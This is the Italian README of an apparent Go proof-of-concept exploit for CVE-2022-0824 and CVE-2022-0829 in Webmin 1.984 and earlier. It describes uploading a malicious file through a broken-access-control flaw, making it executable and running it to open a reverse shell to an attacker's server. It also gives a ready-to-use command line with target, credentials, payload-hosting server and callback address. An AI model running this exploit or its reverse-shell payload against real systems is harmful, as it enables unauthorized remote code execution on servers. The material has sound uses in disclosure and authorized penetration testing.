
Exploit POC per CVE-2022-0824
RCE in Webmin <= 1.984
CVE-2022-0824 and CVE-2022-0829
Questo sfrutta una vulnerabilità BAC in Webmin per caricare un file dannoso, modificarne i permessi ed eseguirlo. Il file, creato nella funzione makePayload, è una reverse shell verso un server controllato dall'attaccante.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> URL di destinazione
c -> credenziali per webmin
sl -> IP e porta del tuo server locale per ospitare il payload
s -> IP di callback
p -> porta di callback
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824